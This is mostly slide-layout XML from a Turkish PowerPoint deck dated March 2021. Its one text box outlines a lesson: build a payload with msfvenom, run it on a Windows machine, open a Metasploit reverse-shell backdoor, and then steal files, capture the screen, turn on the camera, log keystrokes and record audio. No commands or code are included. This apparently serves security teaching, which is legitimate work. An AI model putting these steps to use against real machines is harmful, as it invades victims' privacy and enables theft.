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67" r:id="rId4"/>
    <p:sldId id="268" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="270" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="275" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="277" r:id="rId12"/>
    <p:sldId id="278" r:id="rId13"/>
    <p:sldId id="279" r:id="rId14"/>
    <p:sldId id="280" r:id="rId15"/>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599" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="48" d="100"/>
          <a:sy n="48" d="100"/>
        </p:scale>
        <p:origin x="77" y="907"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="3839"/>
        <p:guide orient="horz" pos="2160"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="88" d="100"/>
          <a:sy n="88" d="100"/>
        </p:scale>
        <p:origin x="30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1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="296056088"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="296056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150"/>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150"/>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln>
      <a:noFill/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr/>
      </a:pPr>
      <a:endParaRPr lang="en-150"/>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5.55112E-17</cdr:y>
    </cdr:from>
    <cdr:to>
      <cdr:x>1</cdr:x>
      <cdr:y>1</cdr:y>
    </cdr:to>
    <cdr:sp macro="" textlink="">
      <cdr:nvSpPr>
        <cdr:cNvPr id="2" name="İçerik Yer Tutucusu 13">
          <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C840511-B043-4AFC-BFF4-C07240FFF4D9}"/>
            </a:ext>
          </a:extLst>
        </cdr:cNvPr>
        <cdr:cNvSpPr>
          <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
        </cdr:cNvSpPr>
      </cdr:nvSpPr>
      <cdr:spPr>
        <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:off x="1573214" y="1955800"/>
          <a:ext cx="9144000" cy="4267200"/>
        </a:xfrm>
        <a:prstGeom xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </cdr:spPr>
      <cdr:txBody>
        <a:bodyPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
          <a:normAutofit/>
        </a:bodyPr>
        <a:lstStyle xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Bu hafta </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0" err="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>msfvenom</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> ile bir zararlı kod parçası(</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0" err="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>payload</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>) oluşturacağız. Oluşturduğumuz bu zararlı kodun Windows makinesinde çalışmasını sağlayacağız ve </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0" err="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>metasploit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framework</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> kullanarak saldırdığımız Windows makinesine ters bir bağlantı açacağız.(</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0" err="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>backdoor</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>)</a:t>
          </a:r>
        </a:p>
        <a:p xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Ters bağlantı kurulduktan sonra Windows makinesi üzerinde kullanıcının dosyasını çalmayı, dosya yüklemeyi, ekranını izlemeyi, ekran görüntüsü almayı, kamerasını açmayı, klavye vuruşlarını yakalamayı, sesini kaydetmeyi, bilgisayarında ses dosyası oynatmayı öğreneceğiz.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00B9EB3-A4C7-4E01-A571-D4580DBEB9E1}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021</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tr-TR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-T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1F1D2114-C821-4865-9C29-2AD2A184E539}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR"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tr-TR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-T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a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1396765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10</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4230171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11</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="473090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12</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190959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13</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3996053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14</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414953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2</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26881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3</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49846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4</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306212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5</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412994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6</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133948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7</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="816020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8</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347469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9</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3570835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2413" y="1905000"/>
            <a:ext cx="9144000" cy="2667000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR"/>
              <a:t>Asıl başlık stilini düzenlemek için tıklayın</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="256" name="çizgi" descr="Çizgi grafiği"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="invGray">
          <a:xfrm>
            <a:off x="1584896" y="4724400"/>
            <a:ext cx="8631936" cy="64008"/>
            <a:chOff x="-4110038" y="2703513"/>
            <a:chExt cx="17394239" cy="160336"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="257" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8"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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5"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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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9" name="Serbest Biçimli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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Alt Başlık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tr-TR"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="çizgi" descr="Çizgi grafiği"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="invGray">
          <a:xfrm>
            <a:off x="1522413" y="1514475"/>
            <a:ext cx="10569575" cy="64008"/>
            <a:chOff x="1522413" y="1514475"/>
            <a:chExt cx="10569575" cy="64008"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Serbest Biçimli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 name="Serbest Biçimli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0" name="Serbest Biçimli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Dikey Metin Yer Tutucusu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CCEFE084-84C7-4ACD-AA97-CC4F85FC341A}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021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0361612" y="274639"/>
            <a:ext cx="1371600" cy="5901747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR"/>
              <a:t>Asıl başlık stilini düzenlemek için tıklayın</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="çizgi" descr="Çizgi grafiği"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="invGray">
          <a:xfrm rot="5400000">
            <a:off x="6864412" y="3472598"/>
            <a:ext cx="6492240" cy="64008"/>
            <a:chOff x="1522413" y="1514475"/>
            <a:chExt cx="10569575" cy="64008"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8"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0"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3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4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5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Dikey Metin Yer Tutucusu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035659C3-CFD7-491E-A329-F275E2F0DDFD}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021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p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR"/>
              <a:t>Asıl başlık stilini düzenlemek için tıklayın</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="167" name="çizgi" descr="Çizgi grafiği"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="invGray">
          <a:xfrm>
            <a:off x="1522413" y="1514475"/>
            <a:ext cx="10569575" cy="64008"/>
            <a:chOff x="1522413" y="1514475"/>
            <a:chExt cx="10569575" cy="64008"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="168"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3"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4"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5"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6"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7"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8"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9"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0"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41"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İçerik Yer Tutucusu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F3B61B9D-3BEB-4885-8337-AB645F3B0260}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021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tr-TR"/>
              <a:t>Asıl başlık stilini düzenlemek için tıklayın</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="255" name="çizgi" descr="Çizgi grafiği"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="invGray">
          <a:xfrm>
            <a:off x="1584896" y="4724400"/>
            <a:ext cx="8631936" cy="64008"/>
            <a:chOff x="-4110038" y="2703513"/>
            <a:chExt cx="17394239" cy="160336"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="256" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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59" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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69" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7"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8" name="Serbest Biçimli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79" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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89" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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299" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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09" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4"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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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19" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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29" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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39" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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49" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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59" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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8" name="Serbest Biçimli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69" name="Serbest Biçimli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0" name="Serbest Biçimli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1" name="Serbest Biçimli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2" name="Serbest Biçimli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3" name="Serbest Biçimli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4" name="Serbest Biçimli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5" name="Serbest Biçimli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6" name="Serbest Biçimli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7" name="Serbest Biçimli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sp>
          <p:nvSpPr>
            <p:cNvPr id="378" name="Serbest Biçimli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p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Metin Yer Tutucusu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3F9CA54D-8C3A-4651-AE5F-32A66F924CF9}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021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p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR"/>
              <a:t>Asıl başlık stilini düzenlemek için tıklayın</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="158" name="çizgi" descr="Çizgi grafiği"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="invGray">
          <a:xfrm>
            <a:off x="1522413" y="1514475"/>
            <a:ext cx="10569575" cy="64008"/>
            <a:chOff x="1522413" y="1514475"/>
            <a:chExt cx="10569575" cy="64008"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="159"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0"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1"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İçerik Yer Tutucusu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1EEF4061-7DB4-4D9F-919E-A2AFA031A789}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021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lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR"/>
              <a:t>Asıl başlık stilini düzenlemek için tıklayın</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="160" name="çizgi" descr="Çizgi grafiği"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="invGray">
          <a:xfrm>
            <a:off x="1522413" y="1514475"/>
            <a:ext cx="10569575" cy="64008"/>
            <a:chOff x="1522413" y="1514475"/>
            <a:chExt cx="10569575" cy="64008"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="161" name="Serbest Biçimli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3"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4"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Metin Yer Tutucusu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8" name="Alt Bilgi Yer Tutucusu 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Tarih Yer Tutucusu 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{450A6235-1FEF-4760-98CF-8ECF9AB2CA71}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>28.03.2021</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slayt Numarası Yer Tutucusu 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{25BA54BD-C84D-46CE-8B72-31BFB26ABA43}" type="slidenum">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="İçerik Yer Tutucusu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tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="156" name="çizgi" descr="Çizgi grafiği"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
